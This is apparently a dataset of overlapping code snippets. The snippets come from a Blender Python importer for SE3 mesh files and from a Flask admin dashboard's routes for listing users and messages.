"map_is_relative) map.type_index = type_index num_of_map_elems = file_query.get_long_value(\"ELEMENTS\") file_query.follows_block_begin_decl() # open elements block processed_elems",
"num_of_verts = file_query.get_long_value(\"VERTICES\") file_query.follows_block_begin_decl() #open vertices block num_of_processed_vertices = 0 while num_of_processed_vertices <",
"= file_query.get_long_value(\"VERTICES\") file_query.follows_block_begin_decl() #open vertices block num_of_processed_vertices = 0 while num_of_processed_vertices < num_of_verts:",
"file_query.get_num_of_values() processed_values = 0 is_last_value = False last_value_idx = num_of_values - 1 while",
"= layer.vertex_maps[vertex_map_index].type if vertex_map_type == se3.VERTEX_MAP_TYPE_MORPH: morph_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_WEIGHT: weight_pointers.append(vertex_data_pointer) elif",
"for se3_weight_map in se3_weight_maps: vertex_groups.append(obj.vertex_groups.new(se3_weight_map.name)) for se3_vertex in se3_vertices: se3_weight_pointers = se3_vertex.weight_pointers if",
"se3_mesh.layers: fgon_edge_indices = [] vertices = se3_layer.vertex_maps[0].elements edges = [] real_faces = []",
"= se3_weight_pointer[0] se3_vertex_weight = se3_layer.vertex_maps[se3_vertex_map_index].elements[se3_weight_pointer[1]] vertex_group_index = se3_layer.vertex_maps[se3_vertex_map_index].type_index vertex_groups[vertex_group_index].add([vertex_index], se3_vertex_weight, 'REPLACE') if se3_layer.surface_maps:",
"se3_vertex_map_index = se3_weight_pointer[0] se3_vertex_weight = se3_layer.vertex_maps[se3_vertex_map_index].elements[se3_weight_pointer[1]] vertex_group_index = se3_layer.vertex_maps[se3_vertex_map_index].type_index vertex_groups[vertex_group_index].add([vertex_index], se3_vertex_weight, 'REPLACE') if",
"edge_index_count = 0 for se3_polygon_index, se3_polygon in enumerate(se3_layer.polygons): se3_num_of_vertex_indices = len(se3_polygon) se3_is_tri_or_quad =",
"processed_polys = 0 while processed_polys < num_of_polys: poly = [] file_query.follows_block_begin_decl() #open polygon",
"file_query.get_long_value(\"POLYGONS_COUNT\") file_query.follows_block_begin_decl() #open polygon count block poly_map = se3.PolygonMap(map_type, map_name, map_smoothing_angle) processed_poly_idxs =",
"uvs_data[uv_index].append(tuple([elem[0], (-elem[1]) + 1]) ) return tuple([tuple(new_indices), uvs_data]) def get_bl_edges(se3_vertex_indices): edges = []",
"edge_not_in(which_edge, edges): for edge in edges: edge_rev = (edge[0], edge[1]) if which_edge ==",
"= num_of_weight_maps get_map_elem = file_query.get_weight_elem num_of_weight_maps += 1 map = se3.VertexMap(map_type, map_name, map_is_relative)",
"#open element block map.elements.append(get_map_elem()) file_query.follows_block_end_decl() #close element block processed_elems += 1 file_query.follows_block_end_decl() #close",
"file_query.follows_block_end_decl() #close polygon maps block file_query.follows_block_end_decl() #close layer block processed_layers += 1 file_query.follows_block_end_decl()",
"obj obj.select_set(True) se3_non_basic_morph_map = se3_layer.non_basic_morph_maps se3_vertices = se3_layer.vertices if se3_non_basic_morph_map: obj.shape_key_add(\"position\") shape_keys =",
"= file_query.get_weight_elem num_of_weight_maps += 1 map = se3.VertexMap(map_type, map_name, map_is_relative) map.type_index = type_index",
"se3_vertex in se3_vertices: se3_weight_pointers = se3_vertex.weight_pointers if se3_weight_pointers: for se3_weight_pointer in se3_weight_pointers: vertex_index",
"elements block processed_maps += 1 layer.vertex_maps_append(map) file_query.follows_block_end_decl() #close vertex map block file_query.follows_block_end_decl() #close",
"se3_layer.vertices if se3_non_basic_morph_map: obj.shape_key_add(\"position\") shape_keys = [] for se3_other_mmap in se3_non_basic_morph_map: shape_keys.append(obj.shape_key_add(se3_other_mmap.name)) for",
"+= 1 file_query.follows_block_end_decl() #close polygons block num_of_poly_maps = file_query.get_long_value(\"POLYGON_MAPS\") file_query.follows_block_begin_decl() #open polygon maps",
"= 0 num_of_texcoord_maps = 0 num_of_weight_maps = 0 num_of_morph_maps = 0 while processed_maps",
"get_se3_mesh_form_file(filepath) for se3_layer in se3_mesh.layers: fgon_edge_indices = [] vertices = se3_layer.vertex_maps[0].elements edges =",
"1 elif map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: type_index = num_of_texcoord_maps get_map_elem = file_query.get_texcoord_elem num_of_texcoord_maps +=",
"idx, other_mp in enumerate(other_morph_pnts): type_idx = se3_layer.vertex_maps[other_mp[0]].type_index se3_disp = se3_layer.vertex_maps[other_mp[0]].elements[other_mp[1]] se3_vert = se3_vertex.basic_morph_pointer[1]",
"for i in range(num_of_uv_tex): uvs_data.append([]) for vert_index in bl_face: real_index = real_face[0].index(vert_index) for",
"Matrix(((-1.0, 0.0, 0.0, 0.0), ( 0.0, 0.0, 1.0, 0.0), ( 0.0, 1.0, 0.0,",
"1 elif map_type == se3.VERTEX_MAP_TYPE_WEIGHT: type_index = num_of_weight_maps get_map_elem = file_query.get_weight_elem num_of_weight_maps +=",
"vertex = se3.Vertex() morph_pointers = vertex.morph_pointers weight_pointers = vertex.weight_pointers uv_pointers = vertex.uv_pointers file_query.follows_block_begin_decl()",
"layer_index) mesh.layers.append(layer) num_of_maps = file_query.get_long_value(\"VERTEX_MAPS\") file_query.follows_block_begin_decl() #open vertex maps block processed_maps = 0",
"#close elements block processed_maps += 1 layer.vertex_maps_append(map) file_query.follows_block_end_decl() #close vertex map block file_query.follows_block_end_decl()",
"num_of_weight_maps get_map_elem = file_query.get_weight_elem num_of_weight_maps += 1 map = se3.VertexMap(map_type, map_name, map_is_relative) map.type_index",
"1 faces = [real_face[0] for real_face in real_faces] mesh = bpy.data.meshes.new(\"Test mesh\") mesh.from_pydata(vertices,",
"= file_query.get_long_value(\"LAYER_INDEX\") file_query.follows_block_begin_decl() #open layer block layer = se3.Layer(layer_name, layer_index) mesh.layers.append(layer) num_of_maps =",
"= [] for i in range(num_of_uv_tex): uvs_data.append([]) for vert_index in bl_face: real_index =",
"= file_query.get_num_of_values() num_of_processed_pointers = 0 is_last_pointer = False last_pointer_index = num_of_pointers - 1",
"0 while processed_maps < num_of_maps: map_type = file_query.get_map_type() map_name = file_query.get_map_name() file_query.follows_block_begin_decl() #open",
"for tessed_face in tessed_faces: fgon_face = [] for tessed_index in tessed_face: fgon_face.append(ngon_face[tessed_index]) fgon_faces.append(tuple(fgon_face))",
"def get_bl_face_uv_data(real_face, bl_face): num_of_uv_tex = len(real_face[1]) uvs_data = [] for i in range(num_of_uv_tex):",
"fgon_faces = [] tessed_faces = ngon_tesselate(vertices, ngon_face) for tessed_face in tessed_faces: fgon_face =",
"get_bl_edges(ngon_face[0]) fgon_faces = get_bl_fgons(vertices, ngon_face[0]) for fgon_face in fgon_faces: material_indices.append(se3_surface_map_index) real_faces.append(tuple( [fgon_face, get_bl_face_uv_data(ngon_face,",
"= 0 num_of_morph_maps = 0 while processed_maps < num_of_maps: map_type = file_query.get_map_type() map_name",
"file_query.follows_block_begin_decl() #open polygons block processed_polys = 0 while processed_polys < num_of_polys: poly =",
"= 0 while processed_poly_idxs < polygon_count: poly_map.polygons.append(file_query.get_poly_idx()) processed_poly_idxs += 1 file_query.follows_block_end_decl() #close polygon",
"1 file_query.follows_block_end_decl() #close elements block processed_maps += 1 layer.vertex_maps_append(map) file_query.follows_block_end_decl() #close vertex map",
"range(num_of_texcoord_maps): uvs_data.append([]) se3_texcoord_maps = se3_layer.texcoord_maps for index in se3_vertex_indices: se3_vertex = se3_layer.vertices[index] new_indices.append(se3_vertex.basic_morph_pointer[1])",
"== edge_rev: return False return True def get_bl_face_uv_data(real_face, bl_face): num_of_uv_tex = len(real_face[1]) uvs_data",
"map_type == se3.VERTEX_MAP_TYPE_WEIGHT: type_index = num_of_weight_maps get_map_elem = file_query.get_weight_elem num_of_weight_maps += 1 map",
"= [] for tessed_index in tessed_face: fgon_face.append(ngon_face[tessed_index]) fgon_faces.append(tuple(fgon_face)) return fgon_faces def edge_not_in(which_edge, edges):",
"is_fgon_edge = edge_not_in(face_edge, bound_edges) edges.append(face_edge) if is_fgon_edge: fgon_edge_indices.append(edge_index_count) edge_index_count += 1 faces =",
"= file_query.get_map_type() map_name = file_query.get_map_name() file_query.follows_block_begin_decl() #open vertex map block if map_type ==",
"tessed_face: fgon_face.append(ngon_face[tessed_index]) fgon_faces.append(tuple(fgon_face)) return fgon_faces def edge_not_in(which_edge, edges): for edge in edges: edge_rev",
"0 for se3_polygon_index, se3_polygon in enumerate(se3_layer.polygons): se3_num_of_vertex_indices = len(se3_polygon) se3_is_tri_or_quad = se3_num_of_vertex_indices <=",
"for face_edge in face_edges: is_fgon_edge = edge_not_in(face_edge, bound_edges) edges.append(face_edge) if is_fgon_edge: fgon_edge_indices.append(edge_index_count) edge_index_count",
"se3_weight_pointer[0] se3_vertex_weight = se3_layer.vertex_maps[se3_vertex_map_index].elements[se3_weight_pointer[1]] vertex_group_index = se3_layer.vertex_maps[se3_vertex_map_index].type_index vertex_groups[vertex_group_index].add([vertex_index], se3_vertex_weight, 'REPLACE') if se3_layer.surface_maps: materials",
"= (1,0) uv_data.append(data) return uvs_data def read_file(operator, context): from mathutils import (Matrix, Vector)",
"map_name, map_smoothing_angle) processed_poly_idxs = 0 while processed_poly_idxs < polygon_count: poly_map.polygons.append(file_query.get_poly_idx()) processed_poly_idxs += 1",
"in edges: edge_rev = (edge[0], edge[1]) if which_edge == edge or which_edge ==",
"tessed_index in tessed_face: fgon_face.append(ngon_face[tessed_index]) fgon_faces.append(tuple(fgon_face)) return fgon_faces def edge_not_in(which_edge, edges): for edge in",
"read_file(operator, context): from mathutils import (Matrix, Vector) import math filepath = operator.filepath se3_mesh",
"num_of_texcoord_maps get_map_elem = file_query.get_texcoord_elem num_of_texcoord_maps += 1 elif map_type == se3.VERTEX_MAP_TYPE_WEIGHT: type_index =",
"processed_maps += 1 layer.vertex_maps_append(map) file_query.follows_block_end_decl() #close vertex map block file_query.follows_block_end_decl() #close vertex maps",
"se3_vertex_weight, 'REPLACE') if se3_layer.surface_maps: materials = [] for se3_surface_map in se3_layer.surface_maps: material =",
"= operator.filepath se3_mesh = get_se3_mesh_form_file(filepath) for se3_layer in se3_mesh.layers: fgon_edge_indices = [] vertices",
"for se3_polygon_index, se3_polygon in enumerate(se3_layer.polygons): se3_num_of_vertex_indices = len(se3_polygon) se3_is_tri_or_quad = se3_num_of_vertex_indices <= 4",
"== se3.VERTEX_MAP_TYPE_MORPH: type_index = num_of_morph_maps get_map_elem = file_query.get_morph_elem map_is_relative = file_query.get_bool_value(\"RELATIVE\") num_of_morph_maps +=",
"uvs_data = [] for i in range(num_of_uv_tex): uvs_data.append([]) for vert_index in bl_face: real_index",
"vertex block num_of_processed_vertices += 1 file_query.follows_block_end_decl() #close vertices block num_of_polys = file_query.get_long_value(\"POLYGONS\") file_query.follows_block_begin_decl()",
"bl_face): num_of_uv_tex = len(real_face[1]) uvs_data = [] for i in range(num_of_uv_tex): uvs_data.append([]) for",
"polygons block processed_polys = 0 while processed_polys < num_of_polys: poly = [] file_query.follows_block_begin_decl()",
"+= 1 layer.vertices.append(vertex) file_query.follows_block_end_decl() #close vertex block num_of_processed_vertices += 1 file_query.follows_block_end_decl() #close vertices",
"#close polygon count block processed_poly_maps += 1 layer.polygon_maps.append(poly_map) layer.surface_maps.append(poly_map) file_query.follows_block_end_decl() #close polygon maps"
] |
[
"import to_me from nonebot.typing import T_State from nonebot.adapters import Bot, Event from .",
"to_me from nonebot.typing import T_State from nonebot.adapters import Bot, Event from . import",
"T_State from nonebot.adapters import Bot, Event from . import req, lang matcher_plugins =",
"lang matcher_plugins = on_command('plugins', aliases={'help', '插件', '帮助'}, priority=1) @matcher_plugins.handle() async def main_plugins(bot: Bot,",
"state: T_State): msg = req.handle_plugins() await matcher_plugins.finish(msg) matcher_basic = on_command('basic', priority=4) @matcher_basic.handle() async",
"on_command('plugins', aliases={'help', '插件', '帮助'}, priority=1) @matcher_plugins.handle() async def main_plugins(bot: Bot, event: Event, state:",
"import Bot, Event from . import req, lang matcher_plugins = on_command('plugins', aliases={'help', '插件',",
"async def main_plugins(bot: Bot, event: Event, state: T_State): msg = req.handle_plugins() await matcher_plugins.finish(msg)",
"on_command from nonebot.rule import to_me from nonebot.typing import T_State from nonebot.adapters import Bot,",
"from . import req, lang matcher_plugins = on_command('plugins', aliases={'help', '插件', '帮助'}, priority=1) @matcher_plugins.handle()",
"from nonebot.rule import to_me from nonebot.typing import T_State from nonebot.adapters import Bot, Event",
"on_command('basic', priority=4) @matcher_basic.handle() async def main_basic(bot: Bot, event: Event, state: T_State): await matcher_basic.finish(lang.help_guide)",
"nonebot.typing import T_State from nonebot.adapters import Bot, Event from . import req, lang",
". import req, lang matcher_plugins = on_command('plugins', aliases={'help', '插件', '帮助'}, priority=1) @matcher_plugins.handle() async",
"from nonebot.typing import T_State from nonebot.adapters import Bot, Event from . import req,",
"priority=1) @matcher_plugins.handle() async def main_plugins(bot: Bot, event: Event, state: T_State): msg = req.handle_plugins()",
"@matcher_plugins.handle() async def main_plugins(bot: Bot, event: Event, state: T_State): msg = req.handle_plugins() await",
"Bot, event: Event, state: T_State): msg = req.handle_plugins() await matcher_plugins.finish(msg) matcher_basic = on_command('basic',",
"Event, state: T_State): msg = req.handle_plugins() await matcher_plugins.finish(msg) matcher_basic = on_command('basic', priority=4) @matcher_basic.handle()",
"msg = req.handle_plugins() await matcher_plugins.finish(msg) matcher_basic = on_command('basic', priority=4) @matcher_basic.handle() async def main_basic(bot:",
"matcher_plugins.finish(msg) matcher_basic = on_command('basic', priority=4) @matcher_basic.handle() async def main_basic(bot: Bot, event: Event, state:",
"import req, lang matcher_plugins = on_command('plugins', aliases={'help', '插件', '帮助'}, priority=1) @matcher_plugins.handle() async def",
"= on_command('plugins', aliases={'help', '插件', '帮助'}, priority=1) @matcher_plugins.handle() async def main_plugins(bot: Bot, event: Event,",
"matcher_plugins = on_command('plugins', aliases={'help', '插件', '帮助'}, priority=1) @matcher_plugins.handle() async def main_plugins(bot: Bot, event:",
"await matcher_plugins.finish(msg) matcher_basic = on_command('basic', priority=4) @matcher_basic.handle() async def main_basic(bot: Bot, event: Event,",
"from nonebot import on_command from nonebot.rule import to_me from nonebot.typing import T_State from",
"matcher_basic = on_command('basic', priority=4) @matcher_basic.handle() async def main_basic(bot: Bot, event: Event, state: T_State):",
"nonebot.rule import to_me from nonebot.typing import T_State from nonebot.adapters import Bot, Event from",
"import on_command from nonebot.rule import to_me from nonebot.typing import T_State from nonebot.adapters import",
"req.handle_plugins() await matcher_plugins.finish(msg) matcher_basic = on_command('basic', priority=4) @matcher_basic.handle() async def main_basic(bot: Bot, event:",
"Event from . import req, lang matcher_plugins = on_command('plugins', aliases={'help', '插件', '帮助'}, priority=1)",
"aliases={'help', '插件', '帮助'}, priority=1) @matcher_plugins.handle() async def main_plugins(bot: Bot, event: Event, state: T_State):",
"T_State): msg = req.handle_plugins() await matcher_plugins.finish(msg) matcher_basic = on_command('basic', priority=4) @matcher_basic.handle() async def",
"nonebot import on_command from nonebot.rule import to_me from nonebot.typing import T_State from nonebot.adapters",
"<filename>src/plugins/basic/__init__.py from nonebot import on_command from nonebot.rule import to_me from nonebot.typing import T_State",
"main_plugins(bot: Bot, event: Event, state: T_State): msg = req.handle_plugins() await matcher_plugins.finish(msg) matcher_basic =",
"event: Event, state: T_State): msg = req.handle_plugins() await matcher_plugins.finish(msg) matcher_basic = on_command('basic', priority=4)",
"Bot, Event from . import req, lang matcher_plugins = on_command('plugins', aliases={'help', '插件', '帮助'},",
"nonebot.adapters import Bot, Event from . import req, lang matcher_plugins = on_command('plugins', aliases={'help',",
"req, lang matcher_plugins = on_command('plugins', aliases={'help', '插件', '帮助'}, priority=1) @matcher_plugins.handle() async def main_plugins(bot:",
"= req.handle_plugins() await matcher_plugins.finish(msg) matcher_basic = on_command('basic', priority=4) @matcher_basic.handle() async def main_basic(bot: Bot,",
"= on_command('basic', priority=4) @matcher_basic.handle() async def main_basic(bot: Bot, event: Event, state: T_State): await",
"def main_plugins(bot: Bot, event: Event, state: T_State): msg = req.handle_plugins() await matcher_plugins.finish(msg) matcher_basic",
"'插件', '帮助'}, priority=1) @matcher_plugins.handle() async def main_plugins(bot: Bot, event: Event, state: T_State): msg",
"from nonebot.adapters import Bot, Event from . import req, lang matcher_plugins = on_command('plugins',",
"'帮助'}, priority=1) @matcher_plugins.handle() async def main_plugins(bot: Bot, event: Event, state: T_State): msg =",
"import T_State from nonebot.adapters import Bot, Event from . import req, lang matcher_plugins"
] |
[
"@app.route(\"/dashboard_show_premium_users\") @admin_login_required def dashboard_show_premium_users(): users = db.session.query(User).filter(User.type==\"premium\") title = \"Premium Users\" return render_template('list/dashboard_users.html',",
"# current.append(task) # elif task.state == \"completed\": # completed.append(task) # else: # deleted.append(task)",
"#needs to be above all functions that use it??? def admin_login_required(f): @wraps(f) def",
"[optional-arg] # -*- coding: utf-8 -*- # \"\"\" routes.py: All Routes \"\"\" #Built-in/Generic",
"@app.route(\"/dashboard\") @admin_login_required def dashboard(): #get all msgs for the user msgs, current_msg =",
"that use it??? def admin_login_required(f): @wraps(f) def decorated_function(): if g.user is None or",
"user_routes import * #needs to be above all functions that use it??? def",
"@admin_login_required def dashboard_show_reported_msgs(): #get all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"reported\") return",
"return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_premium_users\") @admin_login_required def dashboard_show_premium_users(): users = db.session.query(User).filter(User.type==\"premium\") title =",
"= db.session.query(User).filter(User.type==\"reported\") title = \"Reported Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_banned_users\") @admin_login_required def",
"Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_banned_users\") @admin_login_required def dashboard_show_banned_users(): users = db.session.query(User).filter(User.type==\"banned\") title",
"render_template('list/dashboard_msgs.html', msgs=msgs) #Users $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ @app.route(\"/dashboard_show_all_users\") @admin_login_required def dashboard_show_all_users(): users = User.query.all() title =",
"= sorted(current, key=lambda x:(-x.important, x.sort_value)) #return render_template('list/dashboard_filter_all.html', #msgs=msgs, #current=current, #filter=\"All\") #find the list",
"@app.route(\"/dashboard_show_admin_users\") @admin_login_required def dashboard_show_admin_users(): users = db.session.query(User).filter(User.type==\"admin\") title = \"Admin Users\" return render_template('list/dashboard_users.html',",
"user msgs = db.session.query(Msg).filter(Msg.type==\"waiting\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_reported_msgs\") @admin_login_required def dashboard_show_reported_msgs(): #get all",
"None or \"user_id\" not in session: return redirect(url_for(\"dashboard_forbidden\")) elif user_read(session['user_id']).type != \"admin\": return",
"#for task in tasks: # if task.state == \"current\": # current.append(task) # elif",
"@admin_login_required def dashboard_show_banned_users(): users = db.session.query(User).filter(User.type==\"banned\") title = \"Banned Users\" return render_template('list/dashboard_users.html', users=users,",
"user msgs, current_msg = get_msgs_and_current_msg() return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_live_msgs\") @admin_login_required def dashboard_show_live_msgs(): #get",
"@admin_login_required def dashboard_show_live_msgs(): #get all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"live\") return",
"dashboard(): #get all msgs for the user msgs, current_msg = get_msgs_and_current_msg() #if not",
"return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_online_users\") @admin_login_required def dashboard_show_online_users(): users = db.session.query(User).filter(User.online==True) title =",
"String, MetaData, ForeignKey, Boolean ) from sqlalchemy import or_ #Modules from flask_app import",
"decorated_function @app.route(\"/get_msgs_and_current_msg\") def get_msgs_and_current_msg(): user = user_read(session['user_id']) msgs = Msg.query.all() #current_msg = find_current_msg(msgs)",
"render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_reported_msgs\") @admin_login_required def dashboard_show_reported_msgs(): #get all msgs for the user msgs",
"msgs=msgs) @app.route(\"/dashboard_show_live_msgs\") @admin_login_required def dashboard_show_live_msgs(): #get all msgs for the user msgs =",
"title = \"All Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_online_users\") @admin_login_required def dashboard_show_online_users(): users",
"from list from msg_routes import * from user_routes import * #needs to be",
"deleted.append(task) #current = sorted(current, key=lambda x:(-x.important, x.sort_value)) #return render_template('list/dashboard_filter_all.html', #msgs=msgs, #current=current, #filter=\"All\") #find",
"# elif task.state == \"completed\": # completed.append(task) # else: # deleted.append(task) #current =",
"#especially list_routes for find all from list from msg_routes import * from user_routes",
"import User, Msg import msg_routes, user_routes from functools import wraps #for some reason",
"title = \"Reported Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_banned_users\") @admin_login_required def dashboard_show_banned_users(): users",
"render_template, request, url_for, session, flash from flask_sqlalchemy import SQLAlchemy from sqlalchemy import (",
"= get_msgs_and_current_msg() #if not current_msg: #--> return render_template('list/dashboard_msgs.html', msgs=msgs) #current, completed, deleted =",
"x:(-x.important, x.sort_value)) #return render_template('list/dashboard_filter_all.html', #msgs=msgs, #current=current, #filter=\"All\") #find the list with current=True #@app.route(\"/find_current_msg\")",
"= \"Banned Users\" return render_template('list/dashboard_users.html', users=users, title=title) # Main ######################################################################################## @app.route(\"/dashboard_forbidden\") def dashboard_forbidden():",
"# Main ######################################################################################## @app.route(\"/dashboard_forbidden\") def dashboard_forbidden(): return render_template('list/forbidden.html') @app.route(\"/dashboard_error_404\") def dashboard_error_404(): return render_template('list/error_404.html')",
"db.session.query(User).filter(User.type==\"reported\") title = \"Reported Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_banned_users\") @admin_login_required def dashboard_show_banned_users():",
"user msgs, current_msg = get_msgs_and_current_msg() #if not current_msg: #--> return render_template('list/dashboard_msgs.html', msgs=msgs) #current,",
"$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ @app.route(\"/dashboard_show_all_users\") @admin_login_required def dashboard_show_all_users(): users = User.query.all() title = \"All Users\" return",
"current_msg = get_msgs_and_current_msg() #if not current_msg: #--> return render_template('list/dashboard_msgs.html', msgs=msgs) #current, completed, deleted",
"return render_template('list/forbidden.html') @app.route(\"/dashboard_error_404\") def dashboard_error_404(): return render_template('list/error_404.html') @app.route(\"/dashboard\") @admin_login_required def dashboard(): #get all",
"redirect, render_template, request, url_for, session, flash from flask_sqlalchemy import SQLAlchemy from sqlalchemy import",
"session, flash from flask_sqlalchemy import SQLAlchemy from sqlalchemy import ( Table, Column, Integer,",
"@admin_login_required def dashboard_show_online_users(): users = db.session.query(User).filter(User.online==True) title = \"Online Users\" return render_template('list/dashboard_users.html', users=users,",
"@admin_login_required def dashboard_show_admin_users(): users = db.session.query(User).filter(User.type==\"admin\") title = \"Admin Users\" return render_template('list/dashboard_users.html', users=users,",
"= db.session.query(Msg).filter(Msg.type==\"live\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_waiting_msgs\") @admin_login_required def dashboard_show_waiting_msgs(): #get all msgs for",
"title = \"Banned Users\" return render_template('list/dashboard_users.html', users=users, title=title) # Main ######################################################################################## @app.route(\"/dashboard_forbidden\") def",
"\"\"\" routes.py: All Routes \"\"\" #Built-in/Generic import datetime #Libs from flask import Flask,",
"from msg_routes import * from user_routes import * #needs to be above all",
"msgs = db.session.query(Msg).filter(Msg.type==\"reported\") return render_template('list/dashboard_msgs.html', msgs=msgs) #Users $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ @app.route(\"/dashboard_show_all_users\") @admin_login_required def dashboard_show_all_users(): users",
"current_msg = get_msgs_and_current_msg() return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_live_msgs\") @admin_login_required def dashboard_show_live_msgs(): #get all msgs",
"use it??? def admin_login_required(f): @wraps(f) def decorated_function(): if g.user is None or \"user_id\"",
"= User.query.all() title = \"All Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_online_users\") @admin_login_required def",
"from flask_sqlalchemy import SQLAlchemy from sqlalchemy import ( Table, Column, Integer, String, MetaData,",
"msgs = db.session.query(Msg).filter(Msg.type==\"waiting\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_reported_msgs\") @admin_login_required def dashboard_show_reported_msgs(): #get all msgs",
"users = db.session.query(User).filter(User.type==\"reported\") title = \"Reported Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_banned_users\") @admin_login_required",
"@admin_login_required def dashboard_show_all_users(): users = User.query.all() title = \"All Users\" return render_template('list/dashboard_users.html', users=users,",
"be above all functions that use it??? def admin_login_required(f): @wraps(f) def decorated_function(): if",
"return render_template('auth/index.html', msgs=msgs, current_msg=current_msg, num_users=num_users, num_msgs=num_msgs) #Messages @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @app.route(\"/dashboard_show_msgs\") @admin_login_required def dashboard_show_msgs(): #get",
"all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"reported\") return render_template('list/dashboard_msgs.html', msgs=msgs) #Users $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$",
"from functools import wraps #for some reason I need to also import all",
"import Flask, g, redirect, render_template, request, url_for, session, flash from flask_sqlalchemy import SQLAlchemy",
"#msgs=msgs, #current=current, #filter=\"All\") #find the list with current=True #@app.route(\"/find_current_msg\") #def find_current_msg(msgs):# # for",
"msgs=msgs, current_msg=current_msg, num_users=num_users, num_msgs=num_msgs) #Messages @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @app.route(\"/dashboard_show_msgs\") @admin_login_required def dashboard_show_msgs(): #get all msgs",
"f() return decorated_function @app.route(\"/get_msgs_and_current_msg\") def get_msgs_and_current_msg(): user = user_read(session['user_id']) msgs = Msg.query.all() #current_msg",
"= db.session.query(User).count() num_msgs = db.session.query(Msg).count() if 'user_id' not in session or not user_read(session['user_id']):",
"completed, deleted = [], [], [] #tasks = Task.query.filter_by(parent_list=current_msg.id) #tasks = sorted(list(tasks), key=lambda",
"dashboard_show_reported_msgs(): #get all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"reported\") return render_template('list/dashboard_msgs.html', msgs=msgs)",
"#-x.important, #x.state==\"deleted\", #x.state==\"current\", #x.state==\"completed\", #x.id)) #for task in tasks: # if task.state ==",
"msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"waiting\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_reported_msgs\") @admin_login_required def",
"msgs=msgs) @app.route(\"/dashboard_show_waiting_msgs\") @admin_login_required def dashboard_show_waiting_msgs(): #get all msgs for the user msgs =",
"task.state == \"completed\": # completed.append(task) # else: # deleted.append(task) #current = sorted(current, key=lambda",
"@wraps(f) def decorated_function(): if g.user is None or \"user_id\" not in session: return",
"\"Admin Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_premium_users\") @admin_login_required def dashboard_show_premium_users(): users = db.session.query(User).filter(User.type==\"premium\")",
"current_msg = get_msgs_and_current_msg() return render_template('auth/index.html', msgs=msgs, current_msg=current_msg, num_users=num_users, num_msgs=num_msgs) #Messages @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @app.route(\"/dashboard_show_msgs\") @admin_login_required",
"render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_banned_users\") @admin_login_required def dashboard_show_banned_users(): users = db.session.query(User).filter(User.type==\"banned\") title = \"Banned",
"return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_waiting_msgs\") @admin_login_required def dashboard_show_waiting_msgs(): #get all msgs for the user",
"def dashboard_forbidden(): return render_template('list/forbidden.html') @app.route(\"/dashboard_error_404\") def dashboard_error_404(): return render_template('list/error_404.html') @app.route(\"/dashboard\") @admin_login_required def dashboard():",
"[], [], [] #tasks = Task.query.filter_by(parent_list=current_msg.id) #tasks = sorted(list(tasks), key=lambda x:( #-x.important, #x.state==\"deleted\",",
"= get_msgs_and_current_msg() return render_template('auth/index.html', msgs=msgs, current_msg=current_msg, num_users=num_users, num_msgs=num_msgs) #Messages @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @app.route(\"/dashboard_show_msgs\") @admin_login_required def",
"dashboard_show_banned_users(): users = db.session.query(User).filter(User.type==\"banned\") title = \"Banned Users\" return render_template('list/dashboard_users.html', users=users, title=title) #",
"msgs=msgs) #Users $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ @app.route(\"/dashboard_show_all_users\") @admin_login_required def dashboard_show_all_users(): users = User.query.all() title = \"All",
